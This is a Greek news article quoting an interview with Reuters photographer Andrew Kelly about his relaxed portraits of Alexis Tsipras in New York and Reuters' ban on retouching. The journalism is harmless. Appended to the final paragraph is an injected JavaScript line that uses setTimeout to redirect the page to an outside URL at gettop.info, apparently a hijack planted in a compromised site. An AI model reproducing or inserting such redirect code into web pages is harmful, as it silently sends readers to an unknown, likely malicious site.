«…Κύριε Τσίπρα βάλτε τα χέρια στην τσέπη σας και χαλαρώστε»

0
37

 

Ο Αντριου Κέλυ είναι ο άνθρωπος που μας έκανε να δούμε τον Αλέξη Τσίπρα με…»άλλο μάτι»! Ο φωτογράφος του Reuters φωτογράφισε τον Έλληνα πρωθυπουργό στο περιθώριο της επίσκεψής του στη Νέα Υόρκη και το ιδιαίτερο στα εν λόγω καρέ είναι η χαλαρότητα που αποπνέει ο Αλέξης Τσίπρας.

Andrew Kelly - Reuters

Ο Αντριου Κέλυ μίλησε στο Down Town για το πως προέκυψαν τα φωτογραφικά στιγμιότυπα αλλά και αν έχουν επεξεργαστεί οι φωτογραφίες.

Διαβάστε ένα απόσπασμα της συνέντευξης:

Του έδινες οδηγίες ή αυτοσχεδίαζε;

Στην αρχή πήρε μια πολύ σοβαρή πόζα όπως θα άρμοζε σε έναν πολιτικό ηγέτη. Του είπα: «Δεν το θέλουμε έτσι, βάλτε τα χέρια στην τσέπη σας και χαλαρώστε». Κατάλαβε κατευθείαν τι ήθελα και φάνηκε να ανακουφίστηκε που μπορούσε να είναι ο εαυτός του στην φωτογράφιση.

Δεν ένιωθε δηλαδή καμία αμηχανία;

Όχι, καθόλου. Νομίζω άλλωστε ότι είναι συνηθισμένος στις φωτογραφίσεις.

Τσέκαρε τις φωτογραφίες στην κάμερά σου πριν φύγει;

Δεν μου το ζήτησε αλλά πριν φύγει του έδειξα από μόνος μου μια φωτογραφία και του άρεσε. Τις επόμενες ώρες θα τις έβλεπε όλος ο πλανήτης, οπότε ήθελα να δει πρώτος τουλάχιστον μια από αυτές ώστε να μην ανησυχεί για την εικόνα του.

Έκανες ρετούς στις φωτογραφίες για να κρύψεις τις ατέλειές του;

Όχι δεν της επεξεργάστηκα καθόλου. Το photoshop, απαγορεύεται στους φωτογράφους του Reuters. H τροποποίηση των φωτογραφιών είναι παραβίαση των ηθικών κανόνων μας. Καταγράφουμε την πραγματικότητα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here